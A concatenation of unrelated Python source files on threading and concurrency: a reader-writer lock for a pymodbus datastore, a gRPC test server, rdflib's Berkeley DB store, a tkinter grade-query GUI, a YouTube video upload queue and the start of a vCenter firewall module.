self.externalsched(r)
class SuccessLock:
def __init__(self):
self.lock = Lock()
self.pause = Lock()
self.code = 0L
self.success = False
self.finished = True
def reset(self):
self.success = False
self.finished = False
def set(self):
self.lock.acquire()
if not self.pause.locked():
self.pause.acquire()
self.first = True
self.code += 1L
self.lock.release()
return self.code
def trip(self, code, s = False):
self.lock.acquire()
try:
if code == self.code and not self.finished:
r = self.first
self.first = False
if s:
self.finished = True
self.success = True
return r
finally:
self.lock.release()
def give_up(self):
self.lock.acquire()
self.success = False
self.finished = True
self.lock.release()
def wait(self):
self.pause.acquire()
def unwait(self, code):
if code == self.code and self.pause.locked():
self.pause.release()
def isfinished(self):
self.lock.acquire()
x = self.finished
self.lock.release()
return x
|
thread_safe_datastore.py | import threading
from contextlib import contextmanager
from pymodbus.datastore.store import BaseModbusDataBlock
class ContextWrapper(object):
""" This is a simple wrapper around enter
and exit functions that conforms to the pyhton
context manager protocol:
with ContextWrapper(enter, leave):
do_something()
"""
def __init__(self, enter=None, leave=None, factory=None):
self._enter = enter
self._leave = leave
self._factory = factory
def __enter__(self):
if self.enter: self._enter()
return self if not self._factory else self._factory()
def __exit__(self, *args):
if self._leave: self._leave()
class ReadWriteLock(object):
""" This reader writer lock gurantees write order, but not
read order and is generally biased towards allowing writes
if they are available to prevent starvation.
TODO:
* allow user to choose between read/write/random biasing
- currently write biased
- read biased allow N readers in queue
- random is 50/50 choice of next
"""
def __init__(self):
""" Initializes a new instance of the ReadWriteLock
"""
self.queue = [] # the current writer queue
self.lock = threading.Lock() # the underlying condition lock
self.read_condition = threading.Condition(self.lock) # the single reader condition
self.readers = 0 # the number of current readers
self.writer = False # is there a current writer
def __is_pending_writer(self):
return (self.writer # if there is a current writer
or (self.queue # or if there is a waiting writer
and (self.queue[0] != self.read_condition))) # or if the queue head is not a reader
def acquire_reader(self):
""" Notifies the lock that a new reader is requesting
the underlying resource.
"""
with self.lock:
if self.__is_pending_writer(): # if there are existing writers waiting
if self.read_condition not in self.queue: # do not pollute the queue with readers
self.queue.append(self.read_condition) # add the readers in line for the queue
while self.__is_pending_writer(): # until the current writer is finished
self.read_condition.wait(1) # wait on our condition
if self.queue and self.read_condition == self.queue[0]: # if the read condition is at the queue head
self.queue.pop(0) # then go ahead and remove it
self.readers += 1 # update the current number of readers
def acquire_writer(self):
""" Notifies the lock that a new writer is requesting
the underlying resource.
"""
with self.lock:
if self.writer or self.readers: # if we need to wait on a writer or readers
condition = threading.Condition(self.lock) # create a condition just for this writer
self.queue.append(condition) # and put it on the waiting queue
while self.writer or self.readers: # until the write lock is free
condition.wait(1) # wait on our condition
self.queue.pop(0) # remove our condition after our condition is met
self.writer = True # stop other writers from operating
def release_reader(self):
""" Notifies the lock that an existing reader is
finished with the underlying resource.
"""
with self.lock:
self.readers = max(0, self.readers - 1) # readers should never go below 0
if not self.readers and self.queue: # if there are no active readers
self.queue[0].notify_all() # then notify any waiting writers
def release_writer(self):
""" Notifies the lock that an existing writer is
finished with the underlying resource.
"""
with self.lock:
self.writer = False # give up current writing handle
if self.queue: # if someone is waiting in the queue
self.queue[0].notify_all() # wake them up first
else: self.read_condition.notify_all() # otherwise wake up all possible readers
@contextmanager
def get_reader_lock(self):
""" Wrap some code with a reader lock using the
python context manager protocol::
with rwlock.get_reader_lock():
do_read_operation()
"""
try:
self.acquire_reader()
yield self
finally: self.release_reader()
@contextmanager
def get_writer_lock(self):
""" Wrap some code with a writer lock using the
python context manager protocol::
with rwlock.get_writer_lock():
do_read_operation()
"""
try:
self.acquire_writer()
yield self
finally: self.release_writer()
class ThreadSafeDataBlock(BaseModbusDataBlock):
""" This is a simple decorator for a data block. This allows
a user to inject an existing data block which can then be
safely operated on from multiple cocurrent threads.
It should be noted that the choice was made to lock around the
datablock instead of the manager as there is less source of
contention (writes can occur to slave 0x01 while reads can
occur to slave 0x02).
"""
def __init__(self, block):
""" Initialize a new thread safe decorator
:param block: The block to decorate
"""
self.rwlock = ReadWriteLock()
self.block = block
def validate(self, address, count=1):
""" Checks to see if the request is in range
:param address: The starting address
:param count: The number of values to test for
:returns: True if the request in within range, False otherwise
"""
with self.rwlock.get_reader_lock():
return self.block.validate(address, count)
def getValues(self, address, count=1):
""" Returns the requested values of the datastore
:param address: The starting address
:param count: The number of values to retrieve
:returns: The requested values from a:a+c
"""
with self.rwlock.get_reader_lock():
return self.block.getValues(address, count)
def setValues(self, address, values):
""" Sets the requested values of the datastore
:param address: The starting address
:param values: The new values to be set
"""
with self.rwlock.get_writer_lock():
return self.block.setValues(address, values)
if __name__ == "__main__":
class AtomicCounter(object):
def __init__(self, **kwargs):
self.counter = kwargs.get('start', 0)
self.finish = kwargs.get('finish', 1000)
self.lock = threading.Lock()
def increment(self, count=1):
with self.lock:
self.counter += count
def is_running(self):
return self.counter <= self.finish
locker = ReadWriteLock()
readers, writers = AtomicCounter(), AtomicCounter()
def read():
while writers.is_running() and readers.is_running():
with locker.get_reader_lock():
readers.increment()
def write():
while writers.is_running() and readers.is_running():
with locker.get_writer_lock():
writers.increment()
rthreads = [threading.Thread(target=read) for i in range(50)]
wthreads = [threading.Thread(target=write) for i in range(2)]
for t in rthreads + wthreads: t.start()
for t in rthreads + wthreads: t.join()
print("readers[%d] writers[%d]" % (readers.counter, writers.counter))
|
grpcserver.py | import os
import sys
import grpc
import json
import base64
import threading
import importlib
from concurrent import futures
from google.protobuf import json_format
sys.path.append(os.path.join(os.path.dirname(__file__), "..", "..", "art"))
sys.path.append(os.path.join(os.path.dirname(__file__), "..", "..", "art", "sanity"))
pb2_grpc = importlib.import_module("sanity_pb2_grpc")
pb2 = importlib.import_module("sanity_pb2")
GRPC_PORT = 50051
class OpenapiServicer(pb2_grpc.OpenapiServicer):
def __init__(self):
self._prefix_config = None
super(OpenapiServicer, self).__init__()
def _log(self, value):
print("gRPC Server: %s" %value)
def SetConfig(self, request, context):
self._log("Executing SetConfig")
response_400 = """
{
"status_code_400" : {
"errors" : ["invalid value"]
}
}
"""
response_200 = """
{
"status_code_200" : "%s"
}
""" % base64.b64encode(
b"success"
).decode(
"utf-8"
)
test = request.prefix_config.l.integer
self._prefix_config = json_format.MessageToDict(
request.prefix_config, preserving_proto_field_name=True
)
if test is not None and (test < 10 or test > 90):
res_obj = json_format.Parse(response_400, pb2.SetConfigResponse())
else:
res_obj = json_format.Parse(response_200, pb2.SetConfigResponse())
return res_obj
def GetConfig(self, request, context):
self._log("Executing GetConfig")
response_200 = {
"status_code_200": self._prefix_config
}
res_obj = json_format.Parse(
json.dumps(response_200), pb2.GetConfigResponse()
)
return res_obj
def gRpcServer():
server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
pb2_grpc.add_OpenapiServicer_to_server(OpenapiServicer(), server)
print("gRPC Server: Starting server. Listening on port %s." % GRPC_PORT)
server.add_insecure_port("[::]:{}".format(GRPC_PORT))
server.start()
try:
server.wait_for_termination()
except KeyboardInterrupt:
server.stop(5)
print("Server shutdown gracefully")
def grpc_server():
web_server_thread = threading.Thread(target=gRpcServer)
web_server_thread.setDaemon(True)
web_server_thread.start()
if __name__ == '__main__':
gRpcServer() |
sleepycat.py | from rdflib.store import Store, VALID_STORE, NO_STORE
from rdflib.term import URIRef
from rdflib.py3compat import b
def bb(u):
return u.encode('utf-8')
try:
from bsddb import db
has_bsddb = True
except ImportError:
try:
from bsddb3 import db
has_bsddb = True
except ImportError:
has_bsddb = False
from os import mkdir
from os.path import exists, abspath
from urllib import pathname2url
from threading import Thread
if has_bsddb:
# These are passed to bsddb when creating DBs
# passed to db.DBEnv.set_flags
ENVSETFLAGS = db.DB_CDB_ALLDB
# passed to db.DBEnv.open
ENVFLAGS = db.DB_INIT_MPOOL | db.DB_INIT_CDB | db.DB_THREAD
CACHESIZE = 1024 * 1024 * 50
# passed to db.DB.Open()
DBOPENFLAGS = db.DB_THREAD
import logging
logger = logging.getLogger(__name__)
__all__ = ['Sleepycat']
class Sleepycat(Store):
context_aware = True
formula_aware = True
transaction_aware = False
graph_aware = True
db_env = None
batch_unification = False
def __init__(self, configuration=None, identifier=None):
if not has_bsddb:
raise ImportError(
"Unable to import bsddb/bsddb3, store is unusable.")
self.__open = False
self.__identifier = identifier
super(Sleepycat, self).__init__(configuration)
self._loads = self.node_pickler.loads
self._dumps = self.node_pickler.dumps
def __get_identifier(self):
return self.__identifier
identifier = property(__get_identifier)
def _init_db_environment(self, homeDir, create=True):
if not exists(homeDir):
if create is True:
mkdir(homeDir)
# TODO: implement create method and refactor this to it
self.create(homeDir)
else:
return NO_STORE
db_env = db.DBEnv()
db_env.set_cachesize(0, CACHESIZE) # TODO
# db_env.set_lg_max(1024*1024)
db_env.set_flags(ENVSETFLAGS, 1)
db_env.open(homeDir, ENVFLAGS | db.DB_CREATE)
return db_env
def is_open(self):
return self.__open
def open(self, path, create=True):
if not has_bsddb:
return NO_STORE
homeDir = path
if self.__identifier is None:
self.__identifier = URIRef(pathname2url(abspath(homeDir)))
db_env = self._init_db_environment(homeDir, create)
if db_env == NO_STORE:
return NO_STORE
self.db_env = db_env
self.__open = True
dbname = None
dbtype = db.DB_BTREE
# auto-commit ensures that the open-call commits when transactions
# are enabled
dbopenflags = DBOPENFLAGS
if self.transaction_aware is True:
dbopenflags |= db.DB_AUTO_COMMIT
if create:
dbopenflags |= db.DB_CREATE
dbmode = 0660
dbsetflags = 0
# create and open the DBs
self.__indicies = [None, ] * 3
self.__indicies_info = [None, ] * 3
for i in xrange(0, 3):
index_name = to_key_func(
i)((b("s"), b("p"), b("o")), b("c")).decode()
index = db.DB(db_env)
index.set_flags(dbsetflags)
index.open(index_name, dbname, dbtype, dbopenflags, dbmode)
self.__indicies[i] = index
self.__indicies_info[i] = (index, to_key_func(i), from_key_func(i))
lookup = {}
for i in xrange(0, 8):
results = []
for start in xrange(0, 3):
score = 1
len = 0
for j in xrange(start, start + 3):
if i & (1 << (j % 3)):
score = score << 1
len += 1
else:
break
tie_break = 2 - start
results.append(((score, tie_break), start, len))
results.sort()
score, start, len = results[-1]
def get_prefix_func(start, end):
def get_prefix(triple, context):
if context is None:
yield ""
else:
yield context
i = start
while i < end:
yield triple[i % 3]
i += 1
yield ""
return get_prefix
lookup[i] = (
self.__indicies[start],
get_prefix_func(start, start + len),
from_key_func(start),
results_from_key_func(start, self._from_string))
self.__lookup_dict = lookup
self.__contexts = db.DB(db_env)
self.__contexts.set_flags(dbsetflags)
self.__contexts.open("contexts", dbname, dbtype, dbopenflags, dbmode)
self.__namespace = db.DB(db_env)
self.__namespace.set_flags(dbsetflags)
self.__namespace.open("namespace", dbname, dbtype, dbopenflags, dbmode)
self.__prefix = db.DB(db_env)
self.__prefix.set_flags(dbsetflags)
self.__prefix.open("prefix", dbname, dbtype, dbopenflags, dbmode)
self.__k2i = db.DB(db_env)
self.__k2i.set_flags(dbsetflags)
self.__k2i.open("k2i", dbname, db.DB_HASH, dbopenflags, dbmode)
self.__i2k = db.DB(db_env)
self.__i2k.set_flags(dbsetflags)
self.__i2k.open("i2k", dbname, db.DB_RECNO, dbopenflags, dbmode)
self.__needs_sync = False
t = Thread(target=self.__sync_run)
t.setDaemon(True)
t.start()
self.__sync_thread = t
return VALID_STORE
def __sync_run(self):
from time import sleep, time
try:
min_seconds, max_seconds = 10, 300
while self.__open:
if self.__needs_sync:
t0 = t1 = time()
self.__needs_sync = False
while self.__open:
sleep(.1)
if self.__needs_sync:
t1 = time()
self.__needs_sync = False
if time() - t1 > min_seconds \
or time() - t0 > max_seconds:
self.__needs_sync = False
logger.debug("sync")
self.sync()
break
else:
sleep(1)
except Exception, e:
logger.exception(e)
def sync(self):
if self.__open:
for i in self.__indicies:
i.sync()
self.__contexts.sync()
self.__namespace.sync()
self.__prefix.sync()
self.__i2k.sync()
self.__k2i.sync()
def close(self, commit_pending_transaction=False):
self.__open = False
self.__sync_thread.join()
for i in self.__indicies:
i.close()
self.__contexts.close()
self.__namespace.close()
self.__prefix.close()
self.__i2k.close()
self.__k2i.close()
self.db_env.close()
def add(self, triple, context, quoted=False, txn=None):
"""\
Add a triple to the store of triples.
"""
(subject, predicate, object) = triple
assert self.__open, "The Store must be open."
assert context != self, "Can not add triple directly to store"
Store.add(self, (subject, predicate, object), context, quoted)
_to_string = self._to_string
s = _to_string(subject, txn=txn)
p = _to_string(predicate, txn=txn)
o = _to_string(object, txn=txn)
c = _to_string(context, txn=txn)
cspo, cpos, cosp = self.__indicies
value = cspo.get(bb("%s^%s^%s^%s^" % (c, s, p, o)), txn=txn)
if value is None:
self.__contexts.put(bb(c), "", txn=txn)
contexts_value = cspo.get(
bb("%s^%s^%s^%s^" % ("", s, p, o)), txn=txn) or b("")
contexts = set(contexts_value.split(b("^")))
contexts.add(bb(c))
contexts_value = b("^").join(contexts)
assert contexts_value is not None
cspo.put(bb("%s^%s^%s^%s^" % (c, s, p, o)), "", txn=txn)
cpos.put(bb("%s^%s^%s^%s^" % (c, p, o, s)), "", txn=txn)
cosp.put(bb("%s^%s^%s^%s^" % (c, o, s, p)), "", txn=txn)
if not quoted:
cspo.put(bb(
"%s^%s^%s^%s^" % ("", s, p, o)), contexts_value, txn=txn)
cpos.put(bb(
"%s^%s^%s^%s^" % ("", p, o, s)), contexts_value, txn=txn)
cosp.put(bb(
"%s^%s^%s^%s^" % ("", o, s, p)), contexts_value, txn=txn)
self.__needs_sync = True
def __remove(self, (s, p, o), c, quoted=False, txn=None):
cspo, cpos, cosp = self.__indicies
contexts_value = cspo.get(
b("^").join([b(""), s, p, o, b("")]), txn=txn) or b("")
contexts = set(contexts_value.split(b("^")))
contexts.discard(c)
contexts_value = b("^").join(contexts)
for i, _to_key, _from_key in self.__indicies_info:
i.delete(_to_key((s, p, o), c), txn=txn)
if not quoted:
if contexts_value:
for i, _to_key, _from_key in self.__indicies_info:
i.put(_to_key((s, p, o), b("")), contexts_value, txn=txn)
else:
for i, _to_key, _from_key in self.__indicies_info:
try:
i.delete(_to_key((s, p, o), b("")), txn=txn)
except db.DBNotFoundError:
pass # TODO: is it okay to ignore these?
def remove(self, (subject, predicate, object), context, txn=None):
assert self.__open, "The Store must be open."
Store.remove(self, (subject, predicate, object), context)
_to_string = self._to_string
if context is not None:
if context == self:
context = None
if subject is not None \
and predicate is not None \
and object is not None \
and context is not None:
s = _to_string(subject, txn=txn)
p = _to_string(predicate, txn=txn)
o = _to_string(object, txn=txn)
c = _to_string(context, txn=txn)
value = self.__indicies[0].get(bb("%s^%s^%s^%s^" %
(c, s, p, o)), txn=txn)
if value is not None:
self.__remove((bb(s), bb(p), bb(o)), bb(c), txn=txn)
self.__needs_sync = True
else:
cspo, cpos, cosp = self.__indicies
index, prefix, from_key, results_from_key = self.__lookup(
(subject, predicate, object), context, txn=txn)
cursor = index.cursor(txn=txn)
try:
current = cursor.set_range(prefix)
needs_sync = True
except db.DBNotFoundError:
current = None
needs_sync = False
cursor.close()
while current:
key, value = current
cursor = index.cursor(txn=txn)
try:
cursor.set_range(key)
# Hack to stop 2to3 converting this to next(cursor)
current = getattr(cursor, 'next')()
except db.DBNotFoundError:
current = None
cursor.close()
if key.startswith(prefix):
c, s, p, o = from_key(key)
if context is None:
contexts_value = index.get(key, txn=txn) or b("")
# remove triple from all non quoted contexts
contexts = set(contexts_value.split(b("^")))
# and from the conjunctive index
contexts.add(b(""))
for c in contexts:
for i, _to_key, _ in self.__indicies_info:
i.delete(_to_key((s, p, o), c), txn=txn)
else:
self.__remove((s, p, o), c, txn=txn)
else:
break
if context is not None:
if subject is None and predicate is None and object is None:
# TODO: also if context becomes empty and not just on
# remove((None, None, None), c)
try:
self.__contexts.delete(
bb(_to_string(context, txn=txn)), txn=txn)
except db.DBNotFoundError:
pass
self.__needs_sync = needs_sync
def triples(self, (subject, predicate, object), context=None, txn=None):
"""A generator over all the triples matching """
assert self.__open, "The Store must be open."
if context is not None:
if context == self:
context = None
# _from_string = self._from_string ## UNUSED
index, prefix, from_key, results_from_key = self.__lookup(
(subject, predicate, object), context, txn=txn)
cursor = index.cursor(txn=txn)
try:
current = cursor.set_range(prefix)
except db.DBNotFoundError:
current = None
cursor.close()
while current:
key, value = current
cursor = index.cursor(txn=txn)
try:
cursor.set_range(key)
# Cheap hack so 2to3 doesn't convert to next(cursor)
current = getattr(cursor, 'next')()
except db.DBNotFoundError:
current = None
cursor.close()
if key and key.startswith(prefix):
contexts_value = index.get(key, txn=txn)
yield results_from_key(
key, subject, predicate, object, contexts_value)
else:
break
def __len__(self, context=None):
assert self.__open, "The Store must be open."
if context is not None:
if context == self:
context = None
if context is None:
prefix = b("^")
else:
prefix = bb("%s^" % self._to_string(context))
index = self.__indicies[0]
cursor = index.cursor()
current = cursor.set_range(prefix)
count = 0
while current:
key, value = current
if key.startswith(prefix):
count += 1
# Hack to stop 2to3 converting this to next(cursor)
current = getattr(cursor, 'next')()
else:
break
cursor.close()
return count
def bind(self, prefix, namespace):
prefix = prefix.encode("utf-8")
namespace = namespace.encode("utf-8")
bound_prefix = self.__prefix.get(namespace)
if bound_prefix:
self.__namespace.delete(bound_prefix)
self.__prefix[namespace] = prefix
self.__namespace[prefix] = namespace
def namespace(self, prefix):
prefix = prefix.encode("utf-8")
ns = self.__namespace.get(prefix, None)
if ns is not None:
return URIRef(ns.decode('utf-8'))
return None
def prefix(self, namespace):
namespace = namespace.encode("utf-8")
prefix = self.__prefix.get(namespace, None)
if prefix is not None:
return prefix.decode('utf-8')
return None
def namespaces(self):
cursor = self.__namespace.cursor()
results = []
current = cursor.first()
while current:
prefix, namespace = current
results.append((prefix.decode('utf-8'), namespace.decode('utf-8')))
# Hack to stop 2to3 converting this to next(cursor)
current = getattr(cursor, 'next')()
cursor.close()
for prefix, namespace in results:
yield prefix, URIRef(namespace)
def contexts(self, triple=None):
_from_string = self._from_string
_to_string = self._to_string
if triple:
s, p, o = triple
s = _to_string(s)
p = _to_string(p)
o = _to_string(o)
contexts = self.__indicies[0].get(bb(
"%s^%s^%s^%s^" % ("", s, p, o)))
if contexts:
for c in contexts.split(b("^")):
if c:
yield _from_string(c)
else:
index = self.__contexts
cursor = index.cursor()
current = cursor.first()
cursor.close()
while current:
key, value = current
context = _from_string(key)
yield context
cursor = index.cursor()
try:
cursor.set_range(key)
# Hack to stop 2to3 converting this to next(cursor)
current = getattr(cursor, 'next')()
except db.DBNotFoundError:
current = None
cursor.close()
def add_graph(self, graph):
self.__contexts.put(bb(self._to_string(graph)), "")
def remove_graph(self, graph):
self.remove((None, None, None), graph)
def _from_string(self, i):
k = self.__i2k.get(int(i))
return self._loads(k)
def _to_string(self, term, txn=None):
k = self._dumps(term)
i = self.__k2i.get(k, txn=txn)
if i is None:
# weird behavoir from bsddb not taking a txn as a keyword argument
# for append
if self.transaction_aware:
i = "%s" % self.__i2k.append(k, txn)
else:
i = "%s" % self.__i2k.append(k)
self.__k2i.put(k, i, txn=txn)
else:
i = i.decode()
return i
def __lookup(self, (subject, predicate, object), context, txn=None):
_to_string = self._to_string
if context is not None:
context = _to_string(context, txn=txn)
i = 0
if subject is not None:
i += 1
subject = _to_string(subject, txn=txn)
if predicate is not None:
i += 2
predicate = _to_string(predicate, txn=txn)
if object is not None:
i += 4
object = _to_string(object, txn=txn)
index, prefix_func, from_key, results_from_key = self.__lookup_dict[i]
# print (subject, predicate, object), context, prefix_func, index
# #DEBUG
prefix = bb(
"^".join(prefix_func((subject, predicate, object), context)))
return index, prefix, from_key, results_from_key
def to_key_func(i):
def to_key(triple, context):
"Takes a string; returns key"
return b("^").join(
(context,
triple[i % 3],
triple[(i + 1) % 3],
triple[(i + 2) % 3], b(""))) # "" to tac on the trailing ^
return to_key
def from_key_func(i):
def from_key(key):
"Takes a key; returns string"
parts = key.split(b("^"))
return \
parts[0], \
parts[(3 - i + 0) % 3 + 1], \
parts[(3 - i + 1) % 3 + 1], \
parts[(3 - i + 2) % 3 + 1]
return from_key
def results_from_key_func(i, from_string):
def from_key(key, subject, predicate, object, contexts_value):
"Takes a key and subject, predicate, object; returns tuple for yield"
parts = key.split(b("^"))
if subject is None:
# TODO: i & 1: # dis assemble and/or measure to see which is faster
# subject is None or i & 1
s = from_string(parts[(3 - i + 0) % 3 + 1])
else:
s = subject
if predicate is None: # i & 2:
p = from_string(parts[(3 - i + 1) % 3 + 1])
else:
p = predicate
if object is None: # i & 4:
o = from_string(parts[(3 - i + 2) % 3 + 1])
else:
o = object
return (s, p, o), (
from_string(c) for c in contexts_value.split(b("^")) if c)
return from_key
def readable_index(i):
s, p, o = "?" * 3
if i & 1:
s = "s"
if i & 2:
p = "p"
if i & 4:
o = "o"
return "%s,%s,%s" % (s, p, o)
|
gui.py | import tkinter as tk
import threading
from QueryGrade.query_grade import query_grade
class Application:
def __init__(self, master=None):
self.master = master
self.master.title('成绩查询')
self.master.resizable(False, False)
self.create_widgets()
self.is_query = False
def create_widgets(self):
# result frame
rf = tk.Frame(self.master)
rf.pack(side=tk.TOP)
xscrollbar = tk.Scrollbar(rf, orient=tk.HORIZONTAL)
yscrollbar = tk.Scrollbar(rf)
xscrollbar.grid(row=1, column=0, sticky=tk.N+tk.S+tk.E+tk.W)
yscrollbar.grid(row=0, column=1, sticky=tk.N+tk.S+tk.E+tk.W)
self.result = tk.Text(rf, wrap=tk.NONE,
xscrollcommand=xscrollbar.set,
yscrollcommand=yscrollbar.set)
self.result.grid(row=0, column=0)
xscrollbar.config(command=self.result.xview)
yscrollbar.config(command=self.result.yview)
# button frame
bf = tk.Frame(self.master)
bf.pack(side=tk.BOTTOM)
self.username_label = tk.Label(bf, text="用户名")
self.username_label.pack(side=tk.LEFT)
self.username_input = tk.Entry(bf)
self.username_input.pack(side=tk.LEFT)
self.password_label = tk.Label(bf, text="密码")
self.password_label.pack(side=tk.LEFT)
self.password_input = tk.Entry(bf, show="*")
self.password_input.pack(side=tk.LEFT)
self.query_button = tk.Button(
bf, text="查询", command=self.query, width=10)
self.query_button.pack(side=tk.LEFT, padx=30, pady=10)
def sub_thread(self, username, password):
self.is_query = True
res = query_grade(username, password, output=False)
self.is_query = False
self.result.delete("1.0", tk.END)
self.result.insert("1.0", res)
def query(self):
self.result.delete("1.0", tk.END)
if self.is_query:
self.result.insert("1.0", "查询中,请勿重复查询...")
return
username = self.username_input.get().strip()
password = self.password_input.get().strip()
if len(username) == 0 or len(password) == 0:
self.result.insert("1.0", "请输入用户名和密码...")
return
T = threading.Thread(target=self.sub_thread, args=(username, password))
T.start()
self.result.insert("1.0", "查询中...")
root = tk.Tk()
app = Application(master=root)
root.mainloop()
|
youtubequeue.py | import os
import settings
settings.generateConfigFile()
import soundfile as sf
from pydub import AudioSegment
import generatorclient
from time import sleep
from subprocess import *
import videouploader
from threading import Thread
import pickle
import datetime
from datetime import timedelta
from PIL import Image
import subprocess
import videoscript
import random
from moviepy.editor import *
# 18:00 19:00 20:00 23:00 00:00 01:00
waitTill = None
scriptIBuffer = []
def loadVideoScripts():
vidsaves = os.listdir(settings.rawvideosaves)
print(vidsaves)
for vid in vidsaves:
if "DS_Store" in vid:
continue
path = settings.rawvideosaves + "/" + vid
with open(path, 'rb') as pickle_file:
script = pickle.load(pickle_file)
videoscript.videoscripts.append(script)
def parseScripts():
for musicType in generatorclient.musicTypes:
if not os.path.exists(settings.assetPath + "/Music/%s" % musicType):
print("Creating Music Path for %s: %s" % (musicType, settings.assetPath + "/Music/%s" % musicType))
os.makedirs(settings.assetPath + "/Music/%s" % musicType)
if len(os.listdir(settings.assetPath + "/Music/%s/" % musicType)) == 0:
print("Music folder %s is empty! Please add mp3 files into this folder and restart the bot!" % (settings.assetPath + "/Music/%s/" % musicType))
while True:
sleep(10)
print("Music folder %s is empty! Please add mp3 files into this folder and restart the bot!" % (
settings.assetPath + "/Music/%s/" % musicType))
pass
if scriptIBuffer:
for script in scriptIBuffer:
scriptno = script[0]
print("Parsing Raw Script %s" % scriptno)
scripttitle = script[1]
author = script[2]
ups = script[3]
payload = script[4]
final_script = payload[0]
videotype = payload[1]
video_settings = payload[2]
music_type = payload[3]
thumbnail = payload[4]
characters_amount = payload[5]
youtube_title = payload[6]
youtube_description = payload[7]
youtube_tags = payload[8]
videoscript.VideoScriptEngine(scriptno, scripttitle, author, ups, final_script, videotype, video_settings,
music_type, thumbnail, characters_amount, youtube_title, youtube_description,
youtube_tags)
scriptIBuffer.clear()
else:
print("VIDEO GENERATOR no scripts to parse")
def uploadVids():
pass
"""
if renderedVids:
for vid in renderedVids:
vid.generateMovie()
renderedVids.clear()
loadVideoScripts()
"""
def canUpload():
if generatorclient.last_upload_times is not None:
if generatorclient.last_upload_times == 0:
return settings.uploads_a_day
now = datetime.datetime.now()
vids_within_day = 0
for time in generatorclient.last_upload_times:
time = time[0]
if now.hour >= settings.youtube_api_quota_reset_hour:
if time > now.replace(hour=settings.youtube_api_quota_reset_hour, minute=0, second=0):
vids_within_day += 1
else:
if time >= now - timedelta(days=1):
vids_within_day += 1
print("%s Videos uploaded since %s:00" % (vids_within_day, settings.youtube_api_quota_reset_hour))
print("Estimated quote usage %s" % (vids_within_day * 1658))
return settings.uploads_a_day - vids_within_day
return False
def tickThread():
global waitTill
while True:
sleep(5)
if generatorclient.last_upload_times is None and not generatorclient.isRequestingScripts:
print("No update times available... requesting more")
generatorclient.getLastUploadedScripts()
sleep(5)
if videoscript.videoscripts:
print("Rendering all video scripts...")
for script in videoscript.videoscripts:
script.renderVideo()
if waitTill is not None:
if datetime.datetime.now() > waitTill:
waitTill = None
else:
print("Out of Quote Response... waiting till %s" % waitTill)
if settings.exportOffline:
waitTill = None
if not settings.exportOffline:
if waitTill is None:
amount_to_upload = canUpload()
if type(amount_to_upload) is int:
scripts_available_to_upload = [script for i, script in enumerate(videoscript.videoscripts) if
script.isRendered]
print("Allowed to upload %s videos" % amount_to_upload)
if amount_to_upload > len(scripts_available_to_upload):
amount_to_upload = len(scripts_available_to_upload)
print("Only %s scripts available to upload" % amount_to_upload)
print("Uploading %s video scripts... %s ready to upload (total %s)" % (
amount_to_upload, amount_to_upload, len(videoscript.videoscripts)))
for i in range(0, amount_to_upload, 1):
upload = scripts_available_to_upload[i].uploadVideo()
try:
if upload is False:
now = datetime.datetime.now()
if now.hour > settings.youtube_api_quota_reset_hour:
waitTill = now.replace(hour=settings.youtube_api_quota_reset_hour, minute=0, second=0) + timedelta(days=1)
else:
waitTill = now.replace(hour=settings.youtube_api_quota_reset_hour, minute=0, second=0)
except Exception as e:
print(e)
pass
generatorclient.last_upload_times = None
# elif type(amount_to_upload) is bool:
# print("Can't get last update times")
else:
print("Estimated out of quotes waiting till %s" % waitTill)
else:
print("No video scripts, just chilling...")
if not generatorclient.isRequestingScripts:
generatorclient.requestScripts([script.scriptno for script in videoscript.videoscripts])
def initQueue():
## process = subprocess.call("wine /home/royalreddit/Desktop/balcon/balcon.exe -t supnerds -w /home/royalreddit/Desktop/test2.wav", shell = True)
if not os.path.exists(settings.videoqueue_directory):
os.mkdir(settings.videoqueue_directory)
if not os.path.exists(settings.rawvideosaves):
os.mkdir(settings.rawvideosaves)
if not os.path.exists(settings.finishedvideosdirectory):
os.mkdir(settings.finishedvideosdirectory)
if not os.path.exists(settings.overlayPath):
os.mkdir(settings.overlayPath)
if not os.path.exists(f"{settings.currentPath}/TempVids"):
os.mkdir(f"{settings.currentPath}/TempVids")
loadVideoScripts()
generatorclient.connectToServer()
sleep(2)
generatorclient.requestScripts([script.scriptno for script in videoscript.videoscripts])
thread = Thread(target=tickThread)
thread.start()
# uploadVids()
if __name__ == "__main__":
begin = True
if not settings.exportOffline:
videouploader.get_credentials()
else:
print("Video Generator launching in export offline mode")
if not settings.noSpeech:
if settings.use_balcon and settings.use_google_tts:
print("You have selected to use both google tts and balcon tts! Please only select one in the config file!")
begin = False
if not settings.use_balcon and not settings.use_google_tts:
print("You have not selected any tts options in the config file!"
" Please set either google tts or balcon tts to true! Not both!")
begin = False
if settings.use_balcon:
command = "%s -t \"%s\" -n %s" % (settings.balcon_location,
"Balcon Voice Success", settings.balcon_voice)
process = subprocess.call(command, shell=True)
if process != 0:
print("Balcon not found. This will work when the following command works in your commandline: %s" % ("%s -t \"%s\" -n %s" % (settings.balcon_location,
"Balcon Voice Test", settings.balcon_voice)))
begin = False
if settings.use_overlay:
if not os.path.exists(f"{settings.overlayPath}/{settings.overlay_image}"):
print(f"Overlay image {settings.overlayPath}/{settings.overlay_image} does not exist! Fix the file name in config.ini or set use_overlay=False")
begin = False
else:
im = Image.open(f"{settings.overlayPath}/{settings.overlay_image}")
width, height = im.size
if width != 1920 or height != 1080:
print(f"Overlay image {settings.overlayPath}/{settings.overlay_image} not of correct dimensions ({width},{height})! Needs to be 1920x1080")
begin = False
if begin:
initQueue()
|
vcenter_firewall.py | # Copyright 2015 Mirantis, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from multiprocessing import Process
from multiprocessing import Queue
import signal
import six
import threading
import time
import traceback
from neutron.agent import firewall
from oslo_log import log as logging
from oslo_vmware import exceptions as vmware_exceptions
from networking_vsphere._i18n import _LI
from networking_vsphere.common import exceptions
from networking_vsphere.common import vmware_conf as config
from networking_vsphere.utils import dvs_util
from networking_vsphere.utils import security_group_utils as sg_util
LOG = logging.getLogger(__name__)
CONF = config.CONF
CLEANUP_REMOVE_TASKS_TIMEDELTA = 60
def firewall_main(list_queues, remove_queue):
